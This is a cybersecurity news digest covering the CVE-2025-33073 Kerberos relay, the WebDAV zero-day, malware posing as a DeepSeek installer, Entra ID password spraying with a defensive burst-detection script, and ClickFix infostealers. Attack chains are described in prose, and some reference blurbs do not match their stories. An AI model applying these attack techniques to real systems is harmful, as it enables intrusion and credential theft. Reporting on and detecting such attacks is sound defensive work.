CyberSecurity news


Mona Thaker@Microsoft Security Blog //
Microsoft and Wiz have both been recognized as Leaders in the 2025 IDC MarketScape for Cloud-Native Application Protection Platforms (CNAPP). This recognition underscores the growing importance of CNAPP solutions as organizations grapple with securing increasingly complex cloud environments. The IDC MarketScape assesses vendors based on their capabilities and strategic vision, providing guidance for security leaders seeking to replace fragmented point tools with a unified approach to cloud security. Both Microsoft and Wiz have demonstrated a strong commitment to innovation and customer success in cloud security.

The IDC MarketScape emphasizes that selecting a CNAPP vendor involves more than just consolidating tools. It highlights the importance of seamless integration with existing security infrastructure and the ability to enhance the overall security posture. Key considerations include robust monitoring and reporting on cloud security posture, runtime, and application security. Microsoft's recognition stems from its comprehensive, AI-powered, and integrated security solutions for multicloud environments. Wiz is also committed to customer success across cloud security.

Microsoft's Defender for Cloud was specifically lauded for providing visibility into cloud attacks across the entire environment, from endpoints to exposed identities. The platform's holistic approach examines attack vectors both inside and outside the cloud, integrating pre-breach posture graphs with live incidents for exposure risk assessment. Additionally, Microsoft was recognized for its detailed threat analytics, which combines information from various sources to create comprehensive attack paths and facilitate threat prioritization. Customers also highlighted the strong partnership with Microsoft, noting dedicated support and consulting for optimal product use.

References:
  • Microsoft Security Blog: Microsoft Named a Leader in the 2025 IDC CNAPP MarketScape: Key Takeaways for Security Buyers
  • Wiz Blog | RSS feed: Wiz Recognized as a Leader in the 2025 IDC MarketScape for CNAPP
  • AI News: The cloud-native application protection platform (CNAPP) market continues to evolve rapidly as organizations look to secure increasingly complex cloud environments. In the recently published 2025 IDC MarketScape for Worldwide CNAPP, Microsoft has been recognized as a Leader, reaffirming its commitment to delivering comprehensive, AI-powered, and integrated security solutions for multicloud environments.

@www.helpnetsecurity.com //
Russian hackers have found a way to bypass Gmail's multi-factor authentication (MFA) to conduct targeted attacks against academics and critics engaging with Russia discussions. According to Google Threat Intelligence Group (GTIG), the hackers are using stolen app passwords obtained through sophisticated and personalized social engineering attacks. These attacks involve posing as U.S. Department of State officials to build rapport with targets, eventually convincing them to create and share app-specific passwords.

App passwords are 16-digit codes that Google generates to allow certain apps or devices to access a Google Account, bypassing the usual second verification step of MFA. While useful for older or less secure apps that can't handle MFA, app passwords lack the extra layer of security, making them vulnerable to theft or phishing. In one instance, the attackers, tracked as UNC6293 and believed to be state-sponsored, contacted a target under the guise of a State Department representative, inviting them to a consultation in a private online conversation, further lending credibility by CCing four @state.gov accounts.

This campaign, which took place between April and early June, involved meticulously crafted phishing messages that didn't rush the target into immediate action. Instead, the hackers focused on building trust through personalized emails and invitations to private conversations, using spoofed '@state.gov' addresses in the CC field to build credibility. Keir Giles, a prominent British researcher on Russia, was one such target. Google's researchers noted the slow pace at which the attackers built rapport with their victims, repeatedly sending them personalized emails and inviting them to private conversations or meetings.

References:
  • www.bleepingcomputer.com: Russian hackers bypass Gmail MFA using stolen app passwords
  • Malwarebytes: Gmail’s multi-factor authentication bypassed by hackers to pull off targeted attacks
  • Help Net Security: Microsoft will start removing legacy drivers from Windows Update to improve driver quality for Windows users but, most importantly, to increase security, the company has announced.
  • www.techradar.com: Academics and critics engaging with Russia discussions are being targeted in email phishing campaign.

Rescana@Rescana //
Amidst escalating regional conflicts, Iran has taken the drastic measure of shutting down internet access for its citizens, a move the government defends as a necessary precaution against Israeli cyberattacks. This disruption has severely impacted communication within the country, leaving Iranians abroad unable to connect with loved ones. One such individual, Amir Rashidi, expressed his anxiety, stating he hadn't heard from his family in two days and was relying on someone else for updates. The situation highlights the growing intersection of cyber warfare and real-world consequences for civilians.

The internet blackout is not the first instance of Iran limiting connectivity. In the past, similar restrictions were imposed during periods of political unrest, such as the protests in 2019 and 2022. These shutdowns push people towards domestic apps, which are often less secure, while severely restricting access to vital information. Experts like Doug Madory from Kentik have documented significant drops in internet connectivity within Iran following recent Israeli airstrikes, with reductions of 54% initially, followed by further declines of 49% and, subsequently, a staggering 90%.

In a defensive maneuver against cyber threats, Iran is throttling its National Internet Infrastructure. The country claims it is restricting internet connectivity to counter cyber attacks amid regional conflict. The stated aim is to impede cyber intrusions and the synchronization of adversarial operations. An example of the threats Iran faces is demonstrated by the Israeli-linked hackers who seized and burned $90 million from Iran's Nobitex exchange.

References:
  • infosec.exchange: NEW: Iran's government has now admitted that it took down the internet in the country, arguing that it did so to protect against Israeli cyberattacks. I spoke to two Iranians who live abroad and can't communicate with their loved ones back home because of the blackout.
  • WIRED: Iran is limiting internet connectivity for citizens amid Israeli airstrikes—pushing people towards domestic apps, which may not be secure, and limiting their ability to access vital information.
  • Rescana: Iran National Internet Infrastructure Throttling: Cyber Defense Strategy to Prevent Attacks Amid Regional Conflict

@blog.redteam-pentesting.de //
A new Kerberos relay attack, identified as CVE-2025-33073, has been discovered that bypasses NTLM protections and allows attackers to escalate privileges to NT AUTHORITY\SYSTEM. This reflective Kerberos relay attack involves coercing a host to authenticate, intercepting the Kerberos ticket, and relaying it back to the same host, effectively exploiting misconfigurations and the lack of enforced SMB signing. RedTeam Pentesting discovered the vulnerability in January 2025 and disclosed it to Microsoft in an extensive whitepaper.

Microsoft addressed this vulnerability as part of the June 2025 Patch Tuesday. Technical analyses of CVE-2025-33073 have been published by RedTeam Pentesting and Synacktiv. The vulnerability is rooted in how the SMB client negotiates Kerberos authentication. When the SMB client has negotiated Kerberos instead of NTLM, a session key is inserted into a global list, KerbSKeyList, without proper checks, allowing attackers to reuse a subkey under specific conditions to forge a privileged token.

The attack begins with authentication coercion via SMB, tricking a victim machine into connecting to a malicious SMB server. The server forces the client into Kerberos authentication, generates a subkey, logs it into KerbSKeyList with privileged token data, and forges a valid AP-REQ ticket using the subkey. The SMB client accepts and validates the forged ticket, leading to the generation of a SYSTEM token and granting administrative privileges. A proof-of-concept exploit has been made available to demonstrate the vulnerability's potential.

References:
  • bsky.app: RedTeam Pentesting and Synacktiv have published technical analyses of CVE-2025-33073, a new way to execute NTLM reflection attacks. This was fixed in this month's Patch Tuesday and also works against Kerberos.
  • Catalin Cimpanu: RedTeam Pentesting and Synacktiv have published technical analyses of CVE-2025-33073, a new way to execute NTLM reflection attacks. This was fixed in this month's Patch Tuesday and also works against Kerberos.
  • securityonline.info: Windows SMB Flaw (CVE-2025-33073): SYSTEM Privilege Escalation via Kerberos, PoC Available
  • blog.redteam-pentesting.de: Reflective Kerberos Relay Attack
  • www.synacktiv.com: NTLM reflection is dead, long live NTLM reflection: An in-depth analysis of CVE-2025
  • Daily CyberSecurity: Windows SMB Flaw (CVE-2025-33073): SYSTEM Privilege Escalation via Kerberos, PoC Available
  • infosecwriteups.com: Reflective Kerberos Relay Attack (CVE-2025-33073): NT AUTHORITY\SYSTEM Privilege Escalation

Michael Kan@PCMag Middle East ai //
A new cyber threat has emerged, targeting users eager to experiment with the DeepSeek AI model. Cybercriminals are exploiting the popularity of open-source AI by disguising malware as a legitimate installer for DeepSeek-R1. Unsuspecting victims are unknowingly downloading "BrowserVenom" malware, a malicious program designed to steal stored credentials, session cookies, and gain access to cryptocurrency wallets. This sophisticated attack highlights the growing trend of cybercriminals leveraging interest in AI to distribute malware.

This attack vector involves malicious Google ads that redirect users to a fake DeepSeek domain when they search for "deepseek r1." The fraudulent website, designed to mimic the official DeepSeek page, prompts users to download a file named "AI_Launcher_1.21.exe." Once executed, the installer displays a fake installation screen while silently installing BrowserVenom in the background. Security experts at Kaspersky have traced the threat and identified that the malware reconfigures browsers to route traffic through a proxy server controlled by the hackers, enabling them to intercept sensitive data.

Kaspersky's investigation revealed that the BrowserVenom malware can evade many antivirus programs and has already infected computers in various countries, including Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The analysis of the phishing and distribution websites revealed Russian-language comments within the source code, suggesting the involvement of Russian-speaking threat actors. This incident serves as a reminder to verify the legitimacy of websites and software before downloading, especially when dealing with open-source AI tools that require multiple installation steps.

References:
  • gbhackers.com: Threat Actors Exploit DeepSeek-R1 Popularity to Target Windows Device Users
  • PCMag Middle East ai: 'BrowserVenom' Windows Malware Preys on Users Looking to Run DeepSeek AI
  • bsky.app: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legit installer for DeepSeek Victims are unwittingly downloading the "BrowserVenom" malware designed to steal stored credentials, session cookies, etc and gain access to cryptocurrency wallets
  • The Register - Software: DeepSeek installer or just malware in disguise? Click around and find out
  • Malware | Graham Cluley: Malware attack disguises itself as DeepSeek installer
  • Graham Cluley: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legitimate installer for DeepSeek.
  • Securelist: Toxic trend: Another malware threat targets DeepSeek
  • www.pcmag.com: Antivirus provider Kaspersky traces the threat to malicious Google ads.
  • www.techradar.com: Fake DeepSeek website found serving dangerous malware instead of the popular app.
  • www.microsoft.com: Rewriting SymCrypt in Rust to modernize Microsoft’s cryptographic library
  • ASEC: Warning Against Distribution of Malware Disguised as Research Papers (Kimsuky Group)
  • cyble.com: Over 20 Crypto Phishing Applications Found on the Play Store Stealing Mnemonic Phrases

The Hacker News //
A new account takeover (ATO) campaign, dubbed UNK_SneakyStrike, is actively targeting Microsoft Entra ID user accounts. Cybersecurity researchers at Proofpoint have identified that the campaign is leveraging the TeamFiltration pentesting framework to breach accounts. The activity has been ongoing since December 2024, with a surge in login attempts impacting over 80,000 user accounts across hundreds of organizations' cloud tenants. This poses a significant threat to cloud security, as successful account takeovers can lead to data exfiltration and further malicious activities.

The attackers are leveraging the TeamFiltration framework to identify valid user accounts and use password-spraying techniques to gain access. They have been observed utilizing Microsoft Teams API and Amazon Web Services (AWS) servers from various geographic locations to carry out user enumeration and password-spraying attacks. Once an account is compromised, the attackers are able to access sensitive data and potentially upload malicious files to the target user's OneDrive. This campaign demonstrates how legitimate pentesting tools can be exploited for malicious purposes, highlighting the need for robust security measures.

Organizations are advised to monitor for indicators of compromise related to the UNK_SneakyStrike campaign. According to researchers, unauthorized access attempts tend to occur in concentrated bursts targeting a wide range of users within a single cloud environment. This is followed by quiet periods. The attackers appear to be attempting to access all user accounts within smaller cloud tenants while focusing on a subset of users in larger ones. Defenders are urged to check if any of their organization's accounts have been compromised and implement stronger authentication measures to prevent future account takeovers.
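A defender-side sketch of the burst pattern described above (an added example, not Proofpoint's or Microsoft's code): it buckets a constructed, simplified sign-in log per tenant into fixed time windows and flags windows in which many distinct users fail in a short span, the spray signature, optionally reporting what share of a tenant's known users was hit and which accounts then signed in successfully. Field layout, tenant names and users are all constructed for the example.

```python
"""
Burst-style password-spray detection over sign-in events.

Added example. The log format (tenant, UTC timestamp, user, result) is a
constructed simplification; real Entra ID sign-in logs carry many more
fields, but the same windowing logic applies to them.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: tenant-a is sprayed across six users within half a
# minute (one succeeds), then goes quiet; tenant-b sees repeated failures for
# a single user, which is brute force against one account, not a spray.
SAMPLE_LOG = """\
tenant-a,2025-01-10T02:00:05Z,alice@a.example,failure
tenant-a,2025-01-10T02:00:09Z,bob@a.example,failure
tenant-a,2025-01-10T02:00:14Z,carol@a.example,failure
tenant-a,2025-01-10T02:00:20Z,dave@a.example,failure
tenant-a,2025-01-10T02:00:27Z,erin@a.example,failure
tenant-a,2025-01-10T02:00:33Z,frank@a.example,success
tenant-a,2025-01-10T09:15:00Z,alice@a.example,failure
tenant-b,2025-01-10T02:00:05Z,alice@b.example,failure
tenant-b,2025-01-10T02:04:00Z,alice@b.example,failure
tenant-b,2025-01-10T02:09:00Z,alice@b.example,failure
"""

# Constructed directory of each tenant's known accounts, used to measure how
# much of a tenant the burst covered (small tenants tend to be hit in full).
KNOWN_USERS = {
    "tenant-a": {f"{n}@a.example" for n in
                 ("alice", "bob", "carol", "dave", "erin", "frank")},
    "tenant-b": {"alice@b.example", "bob@b.example"},
}


def parse_log(text):
    """Parse CSV lines into (tenant, datetime, user, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        tenant, ts, user, result = line.split(",")
        events.append((tenant,
                       datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       user, result))
    return events


def detect_spray_bursts(events, window=timedelta(minutes=10),
                        min_distinct_users=4, known_users=None):
    """Flag (tenant, window) pairs where attempts touched many distinct users.

    A spray hits many accounts a few times each, so distinct-user count per
    window separates it from single-account brute force. Returns one alert
    per flagged window with attempt count, users hit, any successes seen in
    the same window, and the fraction of the tenant's known users covered.
    """
    by_window = defaultdict(list)  # (tenant, window_start) -> events
    for ev in events:
        tenant, ts = ev[0], ev[1]
        # Floor the timestamp to the start of its fixed-size window.
        start = ts - ((ts - datetime.min) % window)
        by_window[(tenant, start)].append(ev)

    alerts = []
    for (tenant, start), evs in sorted(by_window.items()):
        users = {ev[2] for ev in evs}
        if len(users) < min_distinct_users:
            continue
        alert = {
            "tenant": tenant,
            "window_start": start,
            "attempts": len(evs),
            "distinct_users": len(users),
            # Successes inside a spray window are the accounts to triage first.
            "successes": sorted(ev[2] for ev in evs if ev[3] == "success"),
            "coverage": None,
        }
        if known_users and tenant in known_users:
            known = known_users[tenant]
            alert["coverage"] = len(users & known) / len(known)
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_spray_bursts(parse_log(SAMPLE_LOG), known_users=KNOWN_USERS):
        print(f"{a['tenant']} @ {a['window_start']:%Y-%m-%d %H:%M}: "
              f"{a['attempts']} attempts over {a['distinct_users']} users, "
              f"coverage={a['coverage']:.0%}, successes={a['successes']}")
```

Tune the window and user threshold to the tenant's normal failed-sign-in baseline; the quiet periods the researchers describe mean a single flagged window per tenant is the expected shape, not a stream of them.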

References:
  • Virus Bulletin: Proofpoint threat researchers have recently uncovered an active account takeover (ATO) campaign, tracked as UNK_SneakyStrike, using the TeamFiltration pentesting framework to target Entra ID user accounts.
  • The Hacker News: Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
  • Help Net Security: Researchers warn of ongoing Entra ID account takeover campaign
  • ciso2ciso.com: Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool – Source:thehackernews.com
  • www.helpnetsecurity.com: Researchers warn of ongoing Entra ID account takeover campaign
  • Proofpoint Threat Insight: Attackers Unleash TeamFiltration Account Takeover Campaign
  • BleepingComputer: Password-spraying attacks target 80,000 Microsoft Entra ID accounts
  • Techzine Global: Cybercriminals are using the TeamFiltration pentesting tool in a large-scale campaign targeting Office 365 accounts. The attacks, attributed to UNK_SneakyStrike, have so far targeted more than 80,000 user accounts.
  • www.scworld.com: TeamFiltration pentesting tool harnessed in global Microsoft Entra ID attack campaign
  • bsky.app: Reported UNK_SneakyStrike campaigns have leveraged TeamFiltration which can steal the victim’s Cookies, Password, History, Bookmarks and AutoFill data.
  • sra.io: UNK_SneakyStrike weaponizes TeamFiltration tool targeting 80K+ Entra ID accounts via AWS infrastructure. #AccountTakeover #Microsoft365 #AWS
  • Security Risk Advisors: UNK_SneakyStrike Campaign Weaponizes TeamFiltration Tool to Target 80,000 Entra ID Accounts

@research.checkpoint.com //
Microsoft's June 2025 Patch Tuesday has addressed a total of 66 vulnerabilities across its product range, with one zero-day vulnerability, CVE-2025-33053, being actively exploited in the wild. This critical flaw exists in the Web Distributed Authoring and Versioning (WebDAV) implementation, and its exploitation could lead to remote code execution. Microsoft has issued an urgent security update to mitigate this threat, even for outdated systems like Windows Server 2008 and components of the long-retired Internet Explorer. The urgency of this patch is underscored by the ongoing exploitation of the vulnerability by the Stealth Falcon APT group.

The actively exploited zero-day, CVE-2025-33053, poses a significant risk because attackers can achieve remote code execution at the local level simply by tricking a user into following a malicious link. This vulnerability has been exploited since March 2025 by Stealth Falcon, a hacking group known for targeted attacks in the Middle East. Researchers at Check Point discovered the flaw being used against a Turkish defense company, where malware was inserted to facilitate data exfiltration and the installation of a custom keylogger. The attack involves a .url file disguised as a PDF, which, when clicked, redirects to a WebDAV server controlled by the attacker, causing a legitimate Windows diagnostic tool to execute a malicious file.

Alongside the actively exploited zero-day, Microsoft's June 2025 Patch Tuesday addresses a range of other vulnerabilities, including ten that are rated as "Critical". Another notable flaw, CVE-2025-33073, affects the Windows Server Message Block (SMB) client and could allow attackers to gain SYSTEM privileges. This vulnerability is considered less likely to be exploited but can be mitigated by enforcing server-side SMB signing via Group Policy. The updates also include fixes for vulnerabilities in Microsoft Office, .NET, Visual Studio, and other products, highlighting the breadth of the security update.

References:
  • isc.sans.edu: Microsoft today released patches for 67 vulnerabilities. 10 of these vulnerabilities are rated critical. One vulnerability has already been exploited and another vulnerability has been publicly disclosed before today.
  • BleepingComputer: Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws
  • Tenable Blog: Microsoft’s June 2025 Patch Tuesday Addresses 65 CVEs (CVE-2025-33053)
  • cyberinsider.com: Microsoft's June 2025 Patch Tuesday addresses 66 vulnerabilities across its product suite, including a high-severity zero-day in the WebDAV service that is currently being exploited in the wild.
  • securityonline.info: Stealth Falcon Exploits New Zero-Day (CVE-2025-33053) in Sophisticated Cyberespionage Campaign
  • Cisco Talos Blog: Microsoft Patch Tuesday for June 2025 — Snort rules and prominent vulnerabilities
  • borncity.com: Summarizes the Microsoft security updates for June 10, 2025, noting the zero-day classification.
  • Threats | CyberScoop: Microsoft Patch Tuesday addresses 66 vulnerabilities, including an actively exploited zero-day
  • hackread.com: June 2025 Patch Tuesday: Microsoft Fixes 66 Bugs, Including Active 0-Day
  • CyberInsider: Summary of the June 2025 Patch Tuesday release.
  • research.checkpoint.com: Check Point Research discovered a new campaign conducted by the APT group Stealth Falcon. The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server.
  • gbhackers.com: Microsoft Patch Tuesday June 2025 – 66 Vulnerabilities Patched Including 2 Zero-Day
  • cyberscoop.com: Reports on Microsoft patching 66 vulnerabilities, including an actively exploited zero-day.
  • bsky.app: This month, Microsoft patched 67 vulnerabilities, including one actively exploited zero-day, CVE-2025-33053, a WebDAV RCE discovered by Check Point
  • gbhackers.com: Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild
  • www.helpnetsecurity.com: Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053)
  • Kaspersky official blog: CVE-2025-33053: RCE in WebDAV | Kaspersky official blog
  • thehackernews.com: Microsoft Patches 67 Vulnerabilities Including WEBDAV Zero-Day Exploited in the Wild
  • blog.checkpoint.com: Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day
  • Check Point Blog: Inside Stealth Falcon's Espionage Campaign Using a Microsoft Zero-Day
  • securityonline.info: Stealth Falcon Exploits New Zero-Day (CVE-2025-33053) in Sophisticated Cyberespionage Campaign
  • Blog: Microsoft’s June addressed 66 vulnerabilities. Notably, one of them has been actively exploited, and one other has been publicly disclosed.
  • go.theregister.com: Microsoft warns of 66 flaws to fix for this Patch Tuesday, and two are under active attack
  • arcticwolf.com: Arctic Wolf's blog covering the June 2025 Microsoft Patch Tuesday, mentioning CVE-2025-33053.
  • socprime.com: A new critical zero-day RCE vulnerability in Microsoft Windows, tracked as CVE-2025-33053, has been actively exploited by the Stealth Falcon (aka FruityArmor) APT group. The flaw leads to RCE by manipulating the system’s working directory.
  • www.bleepingcomputer.com: An APT hacking group known as 'Stealth Falcon' exploited a Windows WebDav RCE vulnerability in zero-day attacks since March 2025 against defense and government organizations in Turkey, Qatar, Egypt, and Yemen.
  • arcticwolf.com: Arctic Wolf observes that Microsoft Patch Tuesday: June 2025 includes CVE-2025-33053.
  • Virus Bulletin: Check Point Research discovered a new campaign conducted by the APT group Stealth Falcon. The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server.
  • borncity.com: Microsoft Security Update Summary (June 10, 2025)
  • www.threatdown.com: June 2025 Microsoft Patch Tuesday fixes two zero-days
  • Arctic Wolf: Microsoft Patch Tuesday: June 2025
  • Help Net Security: Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053)
  • thecyberexpress.com: Microsoft Patch Tuesday June 2025: One Zero-Day, Nine High-risk Flaws Fixed
  • infosecwriteups.com: (CVE-2025-33053) New 0-Day in WebDAV Exposes Servers to Remote Code Execution  —  Here’s What You…
  • Action1: June 2025 Vulnerability Digest Recording
  • 0patch Blog: Micropatches Released for WEBDAV Remote Code Execution Vulnerability (CVE-2025-33053)
  • Check Point Research: CVE-2025-33053, Stealth Falcon and Horus: A Saga of Middle Eastern Cyber Espionage

@blogs.microsoft.com //
Microsoft has launched the European Security Program (ESP), a new initiative aimed at significantly strengthening cybersecurity across Europe. The program provides critical resources to governments within the European Union, the United Kingdom, EU accession countries, and members of the European Free Trade Association. Microsoft Vice Chair Brad Smith unveiled the ESP in Berlin, emphasizing the need for enhanced cyber protection amidst growing sophistication and scope of cyber threats.

The ESP is a three-pronged strategy that includes AI-enhanced threat intelligence, direct collaboration with Europol, and automated disruption of malicious infrastructure. The program aims to counter the rising tide of cyberattacks from nation-state actors, specifically those originating from Russia, China, Iran, and North Korea. Microsoft is offering these AI-powered defense tools and threat intelligence resources free of charge to the 27 EU nations.

By offering these resources, Microsoft intends to bolster digital sovereignty and address the operational complexities faced by European governments in defending against cyber threats. The initiative underscores Microsoft's commitment to sharing threat intelligence, strengthening cybersecurity capacity, and expanding partnerships to effectively disrupt malicious cyber activities. The free cyber security support will help European governments combat state-sponsored hackers as attacks continue to intensify across the continent.


Alex Simons@Microsoft Security Blog //
Microsoft is grappling with ongoing issues related to its Windows Updates, with another out-of-band patch released to address problems caused by a previous update. The May Patch Tuesday update had failed to install correctly on some Windows 11 virtual machines, leaving them in recovery mode with an "ACPI.sys" error. KB5062170 aims to resolve this boot error, which affected Windows 11 23H2 and 22H2 systems. It does not, however, fix a separate issue causing blurry CJK fonts in Chromium browsers at 100 percent scaling; the workaround is to increase scaling to 125 or 150 percent. The increasing frequency of these out-of-band fixes highlights ongoing challenges with Microsoft's quality control, impacting both consumer and enterprise users.

Alongside addressing update failures, Microsoft is actively developing AI capabilities and integrating them into its services. While specific details are limited, Microsoft is working towards building a "robust and sophisticated set of agents" across various fields and is looking at evolving identity standards. This future vision involves AI agents that can proactively identify problems, suggest solutions, and maintain context across conversations, going beyond simple request-response interactions. The company recently launched a public preview of its Conditional Access Optimizer Agent and is investing in agents for developer and operations workflows.

In the realm of cybersecurity, Microsoft Threat Intelligence has identified a new Russia-affiliated threat actor named Void Blizzard, active since at least April 2024. Void Blizzard is engaging in worldwide cloud abuse activity and cyberespionage, targeting organizations of interest to Russia in critical sectors such as government, defense, transportation, media, NGOs, and healthcare, primarily in Europe and North America. This discovery underscores the ongoing need for vigilance and proactive threat detection in the face of evolving cyber threats.

References:
  • Microsoft Security Blog: Our industry needs to continue working together on identity standards for agent access across systems. Read about how Microsoft is building a robust and sophisticated set of agents.
  • Davey Winder: Microsoft has confirmed that Windows Update is changing — here's what you need to know.
  • www.microsoft.com: Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024.

Brian Fagioli@BetaNews //
Microsoft is significantly expanding its cybersecurity support for European governments, providing a free security program specifically designed to combat AI-based cyberattacks. This initiative reflects Microsoft's commitment to bolstering the digital defenses of European nations. Furthermore, the company is actively addressing concerns related to competition within the European market, demonstrating a willingness to adapt to regulatory requirements and user preferences.

Microsoft is collaborating with CrowdStrike to harmonize cyber threat attribution. This partnership aims to establish a unified system for identifying and tracking cyber threat actors across different security platforms, which is designed to accelerate response times and strengthen global cyber defenses. The collaborative effort seeks to bridge the gaps created by differing naming systems for threat actors, creating a "Rosetta Stone" for cyber threat intelligence. This mapping will allow security teams to make informed decisions more quickly, correlate threat intelligence across sources, and disrupt malicious activity before it inflicts damage.

In response to Europe’s Digital Markets Act (DMA), Microsoft is making changes to the user experience within the European Economic Area. The company will reduce the frequency with which it prompts users to switch to Edge as their default browser. This change is intended to address complaints from rival browser makers and others who felt that Microsoft was unfairly pushing its own products. Europeans will also find it easier to uninstall the Windows Store and sideline Bing, offering greater control over their digital environment and aligning with the principles of the DMA, which aims to promote competition and user choice in the digital market.

References:
  • bsky.app: While they will not switch to a single threat actor taxonomy, Microsoft and CrowdStrike analysts have already linked more than 80 overlapping threat groups.
  • BetaNews: In cybersecurity, every second counts. But when the same hacking group goes by half a dozen different names depending on which company you ask, defenders are left wasting time instead of stopping attacks.
  • @VMblog: CrowdStrike and Microsoft announced a collaboration to bring clarity and coordination to how cyber threat actors are identified and tracked across...
  • BleepingComputer: Microsoft and CrowdStrike announced today that they've partnered to connect the aliases used for specific threat groups without actually using a single naming standard.
  • SecureWorld News: CrowdStrike and Microsoft Join Forces on Naming Threat Actors
  • www.cybersecuritydive.com: Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy
  • Source: Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies to help security professionals connect insights faster.
  • MSSP feed for Latest: Microsoft and CrowdStrike Align on Threat Actor Mapping to Support Faster, Unified Defense
  • Catalin Cimpanu: Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies
  • betanews.com: In cybersecurity, every second counts. But when the same hacking group goes by half a dozen different names depending on which company you ask, defenders are left wasting time instead of stopping attacks. Now, Microsoft and CrowdStrike are teaming up to clean up the mess they helped create. The two companies just announced a joint effort to map their threat actor naming systems to each other.
  • www.crowdstrike.com: Cybersecurity writers, rejoice! The alliance will help the industry better correlate threat actor aliases without imposing a single naming standard. It will grow in the future to include other organizations that also practice the art of attribution.
  • www.microsoft.com: Announcing a new strategic collaboration to bring clarity to threat actor naming
  • www.scworld.com: Microsoft, CrowdStrike pitch giving threat groups the same name
  • www.cxoinsightme.com: CrowdStrike and Microsoft collaborate to harmonise cyber threat attribution
  • CIO Dive - Latest News: Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy
  • The Hacker News: Microsoft and CrowdStrike are teaming up to align their individual threat actor taxonomies by publishing a new joint threat actor mapping.
  • www.csoonline.com: The partnership creates a shared mapping system that aligns threat actor attribution across both companies’ intelligence ecosystems.
  • aboutdfir.com: Microsoft and CrowdStrike finally fix the stupidest problem in cybersecurity
  • cyberscoop.com: CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
  • www.itpro.com: Confused at all the threat group names? You’re not alone. CrowdStrike and Microsoft want to change that
  • Threats | CyberScoop: Wild variances in naming taxonomies aren’t going away, but a new initiative from the security vendors aims to more publicly address obvious overlap in threat group attribution.
  • www.techradar.com: Microsoft is looking to save precious seconds during cyberattacks by unifying threat actor naming.
  • ComputerWeekly.com: Microsoft outlines three-pronged European cyber strategy
  • CXO Insight Middle East: CrowdStrike and Microsoft collaborate to harmonise cyber threat attribution
  • www.microsoft.com: Meet the Deputy CISOs who help shape Microsoft’s approach to cybersecurity: Part 3
  • Thomas Roccia :verified:: Microsoft and CrowdStrike announced a collaboration to cross-ref their threat actor naming conventions.
  • TechHQ: Microsoft rolls out free cybersecurity support for European governments.

@blog.checkpoint.com //
Microsoft has revealed that Lumma Stealer malware has infected over 394,000 Windows computers across the globe. This data-stealing malware has been actively employed by financially motivated threat actors targeting various industries. Microsoft Threat Intelligence has been tracking the growth and increasing sophistication of Lumma Stealer for over a year, highlighting its persistent threat in the cyber landscape. The malware is designed to harvest sensitive information from infected systems, posing a significant risk to users and organizations alike.

Microsoft, in collaboration with industry partners and international law enforcement, has taken action to disrupt the infrastructure supporting Lumma Stealer. However, the developers behind the malware are reportedly making significant efforts to restore servers and bring the operation back online, indicating the tenacity of the threat. Despite these efforts, security researchers note that the Lumma Stealer operation has suffered reputational damage, potentially making it harder to regain trust among cybercriminals.

In related news, a new Rust-based information stealer called EDDIESTEALER is actively spreading through fake CAPTCHA campaigns, using the ClickFix social engineering tactic to trick users into running malicious PowerShell scripts. EDDIESTEALER targets crypto wallets, browser data, and credentials, demonstrating a continued trend of malware developers utilizing Rust for its enhanced stealth and stability. These developments underscore the importance of vigilance and robust cybersecurity practices to protect against evolving malware threats.

Recommended read:
References :
  • www.microsoft.com: Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer
  • Catalin Cimpanu: Mastodon: The developers of the Lumma Stealer malware are making significant efforts to restore servers and return online.

@securityonline.info //
Elastic Security Labs has identified a new information stealer called EDDIESTEALER, a Rust-based malware distributed through fake CAPTCHA campaigns. These campaigns trick users into executing malicious PowerShell scripts, which then deploy the infostealer onto their systems. EDDIESTEALER is hosted on multiple adversary-controlled web properties and employs the ClickFix social engineering tactic, luring unsuspecting individuals with the promise of CAPTCHA verification. The malware aims to harvest sensitive data, including credentials, browser information, and cryptocurrency wallet details.

This attack chain begins with threat actors compromising legitimate websites, injecting malicious JavaScript payloads that present bogus CAPTCHA check pages. Users are instructed to copy and paste a PowerShell command into their Windows terminal as verification, which retrieves and executes a JavaScript file called gverify.js. This script, in turn, fetches the EDDIESTEALER binary from a remote server, saving it in the downloads folder with a pseudorandom filename. The malware dynamically retrieves configuration data from a command-and-control server, allowing it to adapt its behavior and target specific programs.

EDDIESTEALER is designed to gather system metadata and siphon data of interest from infected hosts, including cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps like Telegram. The malware incorporates string encryption, a custom WinAPI lookup mechanism, and a mutex to prevent multiple instances from running. It also includes anti-sandbox checks and a self-deletion technique using NTFS Alternate Data Streams to evade detection. The dynamic C2 tasking gives attackers flexibility, highlighting the ongoing threat of ClickFix campaigns and the increasing use of Rust in malware development.
